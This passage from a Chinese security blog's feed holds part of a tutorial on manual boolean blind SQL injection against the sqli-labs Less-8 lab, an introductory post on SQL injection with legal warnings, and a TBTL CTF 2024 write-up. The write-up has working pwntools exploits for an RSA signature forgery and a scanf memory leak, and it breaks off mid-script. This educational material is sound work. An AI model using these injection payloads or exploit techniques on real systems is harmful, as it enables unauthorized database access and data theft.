<p>发现那段文字<code>You are in...</code>（后文称提示文字）又重新出现了，这证明：(i)参数是由单引号封装的；(ii)后端对1=1进行了判断并返回TRUE，可以进行布尔盲注。<br>因此推翻之前的SQL语句猜测，此处后端SQL语句形如：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">where</span> id<span class="operator">=</span><span class="string">'1'</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="comment">--+'</span></span><br></pre></td></tr></tbody></table></figure>



<h2 id="布尔盲注思路"><a href="#布尔盲注思路" class="headerlink" title="布尔盲注思路"></a>布尔盲注思路</h2><p>确认能够进行布尔盲注后，我们需要想办法获取我们想要的数据。通常会编写脚本来自动进行布尔盲注，但本文重点在于厘清布尔盲注的原理和实现路线，因此采用手动注入的方法。</p>
<p>首先，我们需要知道当前数据库有哪些表、各自的名称，并判断哪些表含有重要信息；接着，我们需要知道表里有哪些字段、各自的名称，并判断哪些字段含有重要信息；最后我们获取到相应字段对应的每一条记录。</p>
<p>这个由大及小的思路与之前的盲注并无差别，唯一不同的是这次我们不会直接看到查询的结果，而需要通过逻辑表达式和关系表达式是否返回为TRUE来猜解我们想要得到的信息。在布尔盲注的过程中，由于表中数据的不确定性，如果我们想要通过枚举出查询结果所有可能的值，这个工作量是非常大的。因此，我的方法是先确定数据库中表的数量，再确定每一个表的名称。确定表名时，先得到查询结果的字符串长度区间，再确定字符串长度，先确定每一个字符的ASCII码区间，再确定每一个字符的确切ASCII码。如果你有点迷糊了，没有关系，请接着往下看。</p>
<h2 id="确定数据库中表的数量"><a href="#确定数据库中表的数量" class="headerlink" title="确定数据库中表的数量"></a>确定数据库中表的数量</h2><p>我采用的方法是：让后端判断第n个表的字符串长度是否大于0，如果提示文字出现，则证明数据库有第n个表，否则证明数据库中最多有n-1个表。</p>
<p>在地址栏输入</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost/sqli/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) &gt; 0 --+</span><br></pre></td></tr></tbody></table></figure>

<p>后端SQL语句形如：</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> table_name <span class="keyword">where</span> id<span class="operator">=</span><span class="string">'1'</span> <span class="keyword">and</span> (length((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database() limit <span class="number">3</span>,<span class="number">1</span>))) <span class="operator">&gt;</span> <span class="number">0</span> <span class="comment">--+'</span></span><br></pre></td></tr></tbody></table></figure>

<p>这段语句的意思为：从数据库的表名中查询id=’1’的所有字段并且当前数据库中的第4个表名字符串长度大于0。其中length()函数作用是取查询结果的字符串长度，用法为length(字符串)。如果你忘了这句语句中其他地方的含义，请见<a href="../sqli2/">上一章</a>。<br>结果，页面显示了提示文字。表明当前数据库至少有4张表。<br>接着我们将地址栏中的字符改为</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost/sqli/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 4,1))) &gt; 0 --+</span><br></pre></td></tr></tbody></table></figure>

<p>作用是判断第5个表的字符串长度是否大于0，换言之，第5张表是否存在。<br>结果发现页面并没有显示提示文字。<br>由此，我们得到结论：当前数据库中有且仅有4张表。</p>
<h2 id="确定表名的字符串长度"><a href="#确定表名的字符串长度" class="headerlink" title="确定表名的字符串长度"></a>确定表名的字符串长度</h2><p>我们首先确定第一张表的字符串长度，用到的方法与上一小节类似。<br>在地址栏输入</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost/sqli/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) &gt; 5 --+</span><br></pre></td></tr></tbody></table></figure>

<p>作用是判断第一张表表名的字符串长度是否大于5。<br>结果页面显示提示文字，证明第一张表表名的字符串长度大于5。<br>接着我们将5改成6，发现页面不显示提示文字了。答案也就出来了，第一张表表名的字符串长度为6。用同样的方法我们也可以获取其他表名的字符串长度。</p>
<h2 id="确定表名的每一个字符所对应的ASCII码值"><a href="#确定表名的每一个字符所对应的ASCII码值" class="headerlink" title="确定表名的每一个字符所对应的ASCII码值"></a>确定表名的每一个字符所对应的ASCII码值</h2><p>在确定了每张表表名的字符串长度之后，我们就需要确定其每一个字符的具体值。但是表名有可能是字母、数字、标点符号、操作符、特殊字符等，倘若我们一个个尝试，效率会很低。因此我们会想到用ASCII码值来判断字符的具体值。每一个ASCII码对应一个字符，主要对应关系如下图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e798354032.jpg" data-fancybox="default" data-caption="ASCII码对应表"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e798354032.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e798354032.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="ASCII码对应表"></a><span class="image-caption">ASCII码对应表</span></div></div>

<p>我们这里以第四张表为例（问就是第四张表重要），在地址栏输入</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost/sqli/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))) &gt; 96 --+</span><br></pre></td></tr></tbody></table></figure>

<p>其中，substr()函数作用为截取字符串中指定位置开始的指定个字符，用法为：substr(字符串,起始位置,截取长度)，起始位置从1开始。ascii()函数作用为取字符的ASCII码值，用法为ascii(字符)。因此上述语句作用为判断第4张表表名的第一个字符ASCII码值是否大于96。<br>结果发现页面显示提示文字，证明第4张表表名的第一个字符ASCII码值大于96，因此很大概率它是一个小写的英文字母。可以将<code>&gt; 96</code>改为<code>&lt; 123</code>尝试一下，发现的确如此。</p>
<p>接着可以采用二分法来确定该字符的具体值。将<code>&lt; 123</code>改为<code>&gt; 110</code>发现页面显示提示文字，因此将111和122作为两个端点继续划分。将<code>&gt; 110</code>改为<code>&lt; 117</code>发现页面不显示提示文字。因此可以确定该字符为u,v,w,x,y,z中的一个，继续二分法或者枚举都可以得到：该字符为u。</p>
<p>利用同样的方法，我们猜解得到第四张表的表名为<strong>users</strong>。同样地，我们也能够猜解出其他表名。</p>
<h2 id="确定表中字段数"><a href="#确定表中字段数" class="headerlink" title="确定表中字段数"></a>确定表中字段数</h2><p>与确定数据库中表数量的方法一致，只需将<code>table_name</code>替换为<code>column_name</code>，<code>information_schema.tables</code>替换为<code>information_schema.columns</code>，<code>table_schema=database()</code>替换为<code>table_name='users'</code>即可。如：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">http://localhost/sqli/Less-8/?id=1' and (length((select column_name from information_schema.columns where table_name='users' limit 3,1))) &gt; 0 --+</span><br></pre></td></tr></tbody></table></figure>

<p>发现页面显示提示文字，证明users表中至少有4个字段。利用和上文一样的方法，最终可以知道users表中有6个字段。</p>
<h2 id="后续"><a href="#后续" class="headerlink" title="后续"></a>后续</h2><p>确定字段的字符串长度，确定字段的每个字符具体值；确定记录数，确定记录的字符串长度，确定记录的每个字符具体值。方法与前文完全一致。有兴趣的小伙伴可以尝试一下继续手动猜解。</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>本文主要目的是为读者厘清布尔盲注的原理和思路，实际上，手动进行布尔盲注效率十分低下，几乎用不到。但如果时间充裕，可以感受一下手动进行布尔盲注的过程，私以为这有助于更清晰地认识布尔盲注。</p>
]]></content>
      <categories>
        <category>Web安全</category>
      </categories>
      <tags>
        <tag>SQL注入</tag>
      </tags>
  </entry>
  <entry>
    <title>SQL注入新手教程——前言</title>
    <url>/posts/sqliIntro/</url>
    <content><![CDATA[<h2 id="什么是SQL注入？"><a href="#什么是SQL注入？" class="headerlink" title="什么是SQL注入？"></a>什么是SQL注入？</h2><p>​	要了解什么是SQL注入，我们首先要知道SQL是什么。<strong>SQL，全称Structured Query Language</strong>，即数据库的结构化查询语句，用来从数据库中查询内容。<span id="more"></span><br>​	绝大多数网站都有一个<strong>数据库</strong>，比如我们在网购平台搜索商品的时候，其实就是在从网站的数据库中查询我们想要的内容，这个过程就用到了SQL语句，只不过是在设计好的语句中插入了我们输入的值。<br>​	但是如果一个web应用程序对用户输入的内容不进行严格的筛查和过滤，用户就有可能通过改变输入的值、添加SQL语句执行不被授权的操作，从而查看数据库的敏感信息或者在服务器上植入木马等。这个过程就被称为<strong>SQL注入</strong></p>
<h2 id="学习SQL注入需要什么基础？"><a href="#学习SQL注入需要什么基础？" class="headerlink" title="学习SQL注入需要什么基础？"></a>学习SQL注入需要什么基础？</h2><p>​	显然，要学会基本的SQL语句。目前大多数网站使用的都是开源<del>可以白嫖</del>的MySQL数据库，因此建议学MySQL。当然，不同的数据库有不同的特性，但是绝大部分SQL语句都是通用的，因此学好一个数据库，其他的基本上也就没问题了。学的时候有几个重点：掌握好“增删查改“；MySQL自带的information_schema数据库中tables, columns, schemata表要有一个大概的了解（之后学习SQL注入的时候经常要查询其中的内容）。存储引擎、事务、数据库设计之类的可以不用深入学甚至不学。<br>​	其他的一些基础比如cookie，比较零碎，可以学到的时候再进行学习。</p>
<h2 id="如何学习（实践）SQL注入？"><a href="#如何学习（实践）SQL注入？" class="headerlink" title="如何学习（实践）SQL注入？"></a>如何学习（实践）SQL注入？</h2><p>​	SQL注入是一项技术，是技术就需要实践。但我们知道，利用SQL注入攻击他人的网站是违法行为，如果严重甚至构成犯罪。那么想要实践，就剩下两种方案：攻击用于学习SQL注入的网站；攻击自己搭建的测试网页。</p>
<ul>
<li>用于学习SQL注入的网站<ul>
<li><a href="http://testphp.vulnweb.com/">vulnweb</a></li>
<li><a href="https://portswigger.net/">PortSwigger</a></li>
</ul>
</li>
<li>自己搭建靶场<ul>
<li><a href="https://github.com/Audi-1/sqli-labs">sqli-labs</a> (本系列会介绍如何搭建)</li>
<li><a href="https://github.com/digininja/DVWA">DVWA</a><br>这两个项目都在GitHub上开源，搭建教程可以去google或者CSDN搜索。</li>
</ul>
</li>
</ul>
<p><code>再次强调！！！千万不要在未授权的情况下尝试SQL注入！！！</code></p>
<h2 id="SQL注入的分类"><a href="#SQL注入的分类" class="headerlink" title="SQL注入的分类"></a>SQL注入的分类</h2><p>​	通过不同的分类方式，SQL注入被分为许多不同类型。但笔者认为如何分类并不十分重要，关键是要掌握每种SQL注入的原理。当然，还是要简单介绍一下SQL注入的分类。</p>
<ul>
<li><p>按照是否回显（在页面上显示查询的报错信息）可以分为：</p>
<ul>
<li><p>显注</p>
</li>
<li><p>盲注</p>
</li>
</ul>
</li>
<li><p>按照请求方式（服务器获取用户提供信息的方式）可以分为：</p>
<ul>
<li>GET型注入</li>
<li>POST型注入</li>
<li>Cookie型注入</li>
<li>HTTP Header型注入</li>
</ul>
</li>
<li><p>按照插入到查询语句中的参数类型可以分为：</p>
<ul>
<li>数值型注入（传入的参数为数值）</li>
<li>字符型注入（传入的参数为字符串）<ul>
<li>单引号字符型注入（字符串用单引号包裹：’输入的字符串’）</li>
<li>双引号字符型注入（字符串用双引号包裹：”输入的字符串”）</li>
<li>带括号的注入<ul>
<li>数值+括号：(输入的数值)</li>
<li>单引号字符串+括号：(‘输入的字符串’)</li>
<li>双引号字符串+括号：(“输入的字符串”)</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>可以通过RSS订阅本篇博客,下一期将带大家搭建靶场环境🤓🤓🤓</p>
]]></content>
      <categories>
        <category>Web安全</category>
      </categories>
      <tags>
        <tag>SQL注入</tag>
      </tags>
  </entry>
  <entry>
    <title>TBTL CTF 2024 WriteUp</title>
    <url>/posts/tbtlctf-2024-wp/</url>
    <content><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>在 discord 上认识了一群来自世界各地的 ctfer，不过大家都不是什么老赛棍，just ctf for fun!<br>有人在频道里提议参加<a href="https://ctftime.org/event/2324">TBTL CTF 2024</a>，然后就组了个队。比赛时间2天，实际上没什么时间打，做了几个方向的新手友好题。不过队里有个哥们 web 方向 3/4，最后队伍排名36。</p>
<p><img src="https://bu.dusays.com/2024/05/13/6641b5128b62e.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/05/13/6641b5128b62e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="最终排名"></p>
<h2 id="Tower-of-Babel"><a href="#Tower-of-Babel" class="headerlink" title="Tower of Babel"></a>Tower of Babel</h2><p>这是一道简单的社工题。</p>
<p>mp3 文件里有这道题的提示：</p>
<blockquote>
<p>该标志的格式如常，我们的合作伙伴云海连锁控股有限公司总部位于海南岛海口附近。找到距离他们的办事处最近的银行。标志内的内容是该银行的统一社会信用代码。代码已以91开始，以56结束。</p>
</blockquote>
<p>首先搜这家公司，可以通过这个<a href="https://patents.google.com/patent/CN111597584B/zh">网站</a>找到其地址，打开高德地图搜索“云海链8831栋”可以找到该公司位置，然后再搜周边——银行，可以看到最近的银行是海南澄迈农村商业银行股份有限公司科技支行。</p>
<p>然后我们搜索其<a href="https://www.registrationchina.com/company-search/?value=%E6%B5%B7%E5%8D%97%E6%BE%84%E8%BF%88%E5%86%9C%E6%9D%91%E5%95%86%E4%B8%9A%E9%93%B6%E8%A1%8C%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%E7%A7%91%E6%8A%80%E6%94%AF%E8%A1%8C">社会信用代码</a>，得到<code>91469027MA5TRBAW56</code>。</p>
<p>因此 flag 为 <code>TBTL{91469027MA5TRBAW56}</code>。</p>
<h2 id="Wikipedia-Signatures"><a href="#Wikipedia-Signatures" class="headerlink" title="Wikipedia Signatures"></a>Wikipedia Signatures</h2><p>这是一道非常简单的数字签名攻击题目。我们的目标是获取<code>bytes_to_long(b'I challenge you to sign this message!')</code>的数字签名。同时，我们可以提供任何消息给签名者进行数字签名，因此很容易想到这是 RSA 数字签名中的<a href="https://crypto.stackexchange.com/questions/35644/chosen-message-attack-rsa-signature">选择消息攻击</a>。</p>
<p>我们假设<code>m = bytes_to_long(b'I challenge you to sign this message!') </code>，我们的目标是获取其数字签名：</p>
<p>$$ s = m^{d};mod;n$$</p>
<ul>
<li><p>首先，我们让签名者为任意选择的消息 <code>m1</code> 进行签名（这里我选用<code>m1 = bytes_to_long(b'BeaCox')</code>），获取对应的签名：</p>
<p>$$s_1=m_{1}^{d};mod;n$$</p>
</li>
<li><p>然后，我们计算</p>
<p>$$m_2:=m⋅m_{1}^{−1};mod;n$$</p>
<p>并让签名者为其签名，得到</p>
<p>$$s_2=m_2^d;mod;n$$​</p>
</li>
<li><p>由于</p>
<p>$$s≡s1⋅s2≡m_1^d⋅m_2^d≡m_1^d⋅(m⋅m_1^{-1})^d≡m_1^d⋅m^d⋅m_1^{-d}≡m^d;(mod;n)$$</p>
<p>我们很容易得到</p>
<p>$$s=s1⋅s2;mod;n$$</p>
</li>
</ul>
<p>利用代码如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># https://crypto.stackexchange.com/questions/35644/chosen-message-attack-rsa-signature</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> inverse, bytes_to_long</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'0.cloud.chals.io'</span>, <span class="number">31148</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">find_m2</span>(<span class="params">m, n, m1</span>):</span><br><span class="line">    m1_inv = inverse(m1, n)</span><br><span class="line">    m2 = (m * m1_inv) % n</span><br><span class="line">    <span class="keyword">return</span> m2</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_n</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b"RSA public key: ("</span>)</span><br><span class="line">    n = p.recvuntil(<span class="string">b","</span>, drop=<span class="literal">True</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'Sign any other message using wikipedia-RSA'</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">int</span>(n)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b'&gt; '</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sign</span>(<span class="params">message</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">f'2 <span class="subst">{message}</span>'</span>.encode())</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">int</span>(p.recvline().strip())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">win</span>(<span class="params">signature</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">f'1 <span class="subst">{signature}</span>'</span>.encode())</span><br><span class="line"></span><br><span class="line">m = bytes_to_long(<span class="string">b'I challenge you to sign this message!'</span>)</span><br><span class="line">n = get_n()</span><br><span class="line">m1 = bytes_to_long(<span class="string">b'BeaCox'</span>)</span><br><span class="line">m2 = find_m2(m, n, m1)</span><br><span class="line"></span><br><span class="line">s1 = sign(m1)</span><br><span class="line">s2 = sign(m2)</span><br><span class="line">signature = (s1 * s2) % n</span><br><span class="line">win(signature)</span><br><span class="line">p.interactive()</span><br><span class="line"><span class="comment"># TBTL{r3p347_4f73r_m3-d16174l_516n47ur3_15_n07_3ncryp710n}</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="Floo-Powder"><a href="#Floo-Powder" class="headerlink" title="Floo Powder"></a>Floo Powder</h2><p>这是一道简单的逆向题。从 ida 获取静态的数组，然后根据反编译的代码写 z3 的约束，编写 python 脚本来得到正确的输入。</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># input is 31*31 bit(0 or 1) string</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">data = [</span><br><span class="line">    <span class="number">0x04CA4952</span>, <span class="number">0x69745A2A</span>, <span class="number">0x434A2A90</span>, <span class="number">0x36D0A9C7</span>, <span class="number">0x1002DAC8</span>,</span><br><span class="line">    <span class="number">0x04933AEB</span>, <span class="number">0x71A29525</span>, <span class="number">0x6DA8D531</span>, <span class="number">0x69259680</span>, <span class="number">0x2179213C</span>,</span><br><span class="line">    <span class="number">0x5D8A6097</span>, <span class="number">0x6ACA2822</span>, <span class="number">0x5495ED02</span>, <span class="number">0x255A2CD5</span>, <span class="number">0x16B5625A</span>,</span><br><span class="line">    <span class="number">0x2E8A8ABA</span>, <span class="number">0x2D6F5EB4</span>, <span class="number">0x557CD952</span>, <span class="number">0x2CB4E495</span>, <span class="number">0x020D29B9</span>,</span><br><span class="line">    <span class="number">0x0E8B2854</span>, <span class="number">0x4646C159</span>, <span class="number">0x47749281</span>, <span class="number">0x54229D46</span>, <span class="number">0x6C1CD620</span>,</span><br><span class="line">    <span class="number">0x07F80EFF</span>, <span class="number">0x04AD46A4</span>, <span class="number">0x32EBC04E</span>, <span class="number">0x4FAC1623</span>, <span class="number">0x600E1F04</span>,</span><br><span class="line">    <span class="number">0x24CD3000</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line"><span class="comment"># z3 init the input</span></span><br><span class="line"><span class="built_in">input</span> = [BitVec(<span class="string">f"input<span class="subst">{i}</span>"</span>, <span class="number">1</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>*<span class="number">31</span>)]</span><br><span class="line">s = Solver()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">important_func</span>(<span class="params">o_i, i_i, count</span>):</span><br><span class="line">    <span class="comment"># print(f"index1: {index1}, index2: {index2}")</span></span><br><span class="line">    <span class="comment"># ( (input[31 * o_i + i_i] == 49) == (((data[count / 31] &gt;&gt; (31 - count % 31 - 1)) &amp; 1) != 0) )</span></span><br><span class="line">    s.add((<span class="built_in">input</span>[<span class="number">31</span> * o_i + i_i] == <span class="number">1</span>) == (((data[count // <span class="number">31</span>] &gt;&gt; (<span class="number">31</span> - count % <span class="number">31</span> - <span class="number">1</span>)) &amp; <span class="number">1</span>) != <span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">outside_index = <span class="number">0</span></span><br><span class="line">inside_index = <span class="number">0</span></span><br><span class="line">count = <span class="number">0</span></span><br><span class="line">v9 = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (outside_index &lt; <span class="number">31</span> <span class="keyword">and</span> inside_index &lt; <span class="number">31</span>):</span><br><span class="line">    important_func(outside_index, inside_index, count)</span><br><span class="line">    count += <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> v9 == <span class="number">1</span>:</span><br><span class="line">        v10 = outside_index - <span class="number">1</span></span><br><span class="line">        v11 = inside_index + <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        v10 = outside_index + <span class="number">1</span></span><br><span class="line">        v11 = inside_index - <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> v10 &lt; <span class="number">0</span> <span class="keyword">or</span> v10 == <span class="number">31</span> <span class="keyword">or</span> v11 &lt; <span class="number">0</span> <span class="keyword">or</span> v11 == <span class="number">31</span>:</span><br><span class="line">        <span class="keyword">if</span> v9 == <span class="number">1</span>:</span><br><span class="line">            outside_index += inside_index == <span class="number">30</span></span><br><span class="line">            inside_index += inside_index &lt; <span class="number">30</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            inside_index += outside_index == <span class="number">30</span></span><br><span class="line">            outside_index += outside_index &lt; <span class="number">30</span></span><br><span class="line">        v9 = <span class="number">1</span> - v9</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        outside_index = v10</span><br><span class="line">        inside_index = v11</span><br><span class="line"></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="keyword">if</span> s.check() == sat:</span><br><span class="line">    m = s.model()</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>*<span class="number">31</span>):</span><br><span class="line">        flag += <span class="built_in">str</span>(m[<span class="built_in">input</span>[i]])</span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br></pre></td></tr></tbody></table></figure>

<p>我们会得到一个 31*31 的由0和1组成的矩阵：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0000000000000000000000000000000</span><br><span class="line">0111111100100011010010011111110</span><br><span class="line">0100000101101100111100010000010</span><br><span class="line">0101110100111001100001010111010</span><br><span class="line">0101110101101010111100010111010</span><br><span class="line">0101110100010110000001010111010</span><br><span class="line">0100000101010011100001010000010</span><br><span class="line">0111111101010101010101011111110</span><br><span class="line">0000000000000100110111000000000</span><br><span class="line">0111110111110110001011101010100</span><br><span class="line">0001001010100010010001111111100</span><br><span class="line">0101000110101111111101001100000</span><br><span class="line">0100110011111000100100100110100</span><br><span class="line">0001010101101010101111001011000</span><br><span class="line">0000011001110110011001000101000</span><br><span class="line">0111000100100011101001010111000</span><br><span class="line">0111110001010100010000011110110</span><br><span class="line">0100101111000111000000000110100</span><br><span class="line">0101101000100011011011101110100</span><br><span class="line">0100011100011101101001111011000</span><br><span class="line">0101100011011001100001101010100</span><br><span class="line">0100100100111000110001111101000</span><br><span class="line">0000000001010110000111000101000</span><br><span class="line">0111111101100011110011010100000</span><br><span class="line">0100000100000110010101000100000</span><br><span class="line">0101110101000101101101111111110</span><br><span class="line">0101110101000000010011101110110</span><br><span class="line">0101110101111100100111011100100</span><br><span class="line">0100000101101001110010101000100</span><br><span class="line">0111111101111000111110011111000</span><br><span class="line">0000000000000000000000000000000</span><br></pre></td></tr></tbody></table></figure>

<p>可以看到这个矩阵的周围一圈都是0，如果把周围这一圈0都去掉，那么就是一个29*29的矩阵。把0看成白色，1看成黑色，那么这个矩阵看起来就是一个29*29的第三代二维码，写脚本将01矩阵转换为二维码图片：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># convert to qrcode</span></span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line">MAX = <span class="number">31</span></span><br><span class="line">pic = Image.new(<span class="string">"RGB"</span>,(MAX, MAX))</span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> y <span class="keyword">in</span> <span class="built_in">range</span> (<span class="number">0</span>,MAX):</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span> (<span class="number">0</span>,MAX):</span><br><span class="line">        <span class="keyword">if</span>(flag[i] == <span class="string">'1'</span>):</span><br><span class="line">            pic.putpixel([x,y],(<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            pic.putpixel([x,y],(<span class="number">255</span>,<span class="number">255</span>,<span class="number">255</span>))</span><br><span class="line">        i = i+<span class="number">1</span></span><br><span class="line">pic.show()</span><br><span class="line">pic.save(<span class="string">"flag.png"</span>)</span><br><span class="line"><span class="comment"># TBTL{Wh47_D1d_H3_5aY_D34r?_D14g0nal1y...}</span></span><br></pre></td></tr></tbody></table></figure>

<p>扫描二维码就可以获得 flag 。</p>
<h2 id="Enough-with-the-averages"><a href="#Enough-with-the-averages" class="headerlink" title="Enough with the averages"></a>Enough with the averages</h2><p>这是一道利用了scanf函数特性的pwn题。</p>
<p>这道题允许我们输入20个4字节长的整数，然后输出这20个整数的平均值。但是存储这些整数的内存区域含有先前读取的flag。</p>
<p>这个程序使用20个 <code>__isoc99_scanf("%d", &amp;v3[i]);</code> 来读取我们的输入。如果我们输入了一个字符，那么从此以后的scanf都会直接返回-1，导致对应内存区域的4字节为原来的值，最终导致内存泄漏。</p>
<p>我的想法是：首先输入19个0，然后输入一个a，就可以得到目标内存区域的第20个4字节(data[19])；然后启动另一个程序，输入18个0，然后输入一个a，就可以得到data[18]+data[19]，计算可得data[18]，依次类推可以得到目标区域的所有20*4个字节。然后就可以重构出flag。</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.binary = binary = ELF(<span class="string">'./chall'</span>)</span><br><span class="line">context.log_level = <span class="string">'critical'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># we need record 20 int numbers</span></span><br><span class="line">numbers = [<span class="number">0</span>] * <span class="number">20</span></span><br><span class="line"><span class="built_in">sum</span> = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">input</span>(<span class="params">number</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">b':'</span>, number)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">recv_average</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b'Average score is '</span>)</span><br><span class="line">    byte_string = p.recvline().strip()[:-<span class="number">1</span>]</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">float</span>(byte_string)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>):</span><br><span class="line">    <span class="comment"># p = binary.process()</span></span><br><span class="line">    p = remote(<span class="string">'0.cloud.chals.io'</span>, <span class="number">10198</span>)</span><br><span class="line"></span><br><span class="line">    zeros = <span class="number">19</span> - i</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f'zeros: <span class="subst">{zeros}</span>'</span>)</span><br><span class="line">    <span class="comment"># input zeros times of 0</span></span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(zeros):</span><br><span class="line">        <span class="built_in">input</span>(<span class="string">b'0'</span>)</span><br><span class="line">    <span class="built_in">input</span>(<span class="string">b'a'</span>)</span><br><span class="line">    average_score = recv_average()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f'average_score: <span class="subst">{average_score}</span>'</span>)</span><br><span class="line">    tmp = <span class="built_in">sum</span></span><br><span class="line">    <span class="built_in">sum</span> = average_score * <span class="number">20</span></span><br><span class="line">    numbers[zeros] = <span class="built_in">int</span>(<span class="built_in">sum</span> - tmp)</span><br><span class="line">    <span class="keyword">if</span> numbers[zeros] &lt; <span class="number">0</span>:</span><br><span class="line">        numbers[zeros] = <span class="number">0x100000000</span> + numbers[zeros]</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f'numbers[<span class="subst">{zeros}</span>]: <span class="subst">{<span class="built_in">hex</span>(numbers[zeros])}</span>'</span>)</span><br><span class="line">    p.close()</span><br><span class="line"></span><br><span class="line">flag = <span class="string">b''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>, <span class="number">20</span>):</span><br><span class="line">    char1 = numbers[i] &amp; <span class="number">0xff</span></span><br><span class="line">    char2 = (numbers[i] &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xff</span></span><br><span class="line">    char3 = 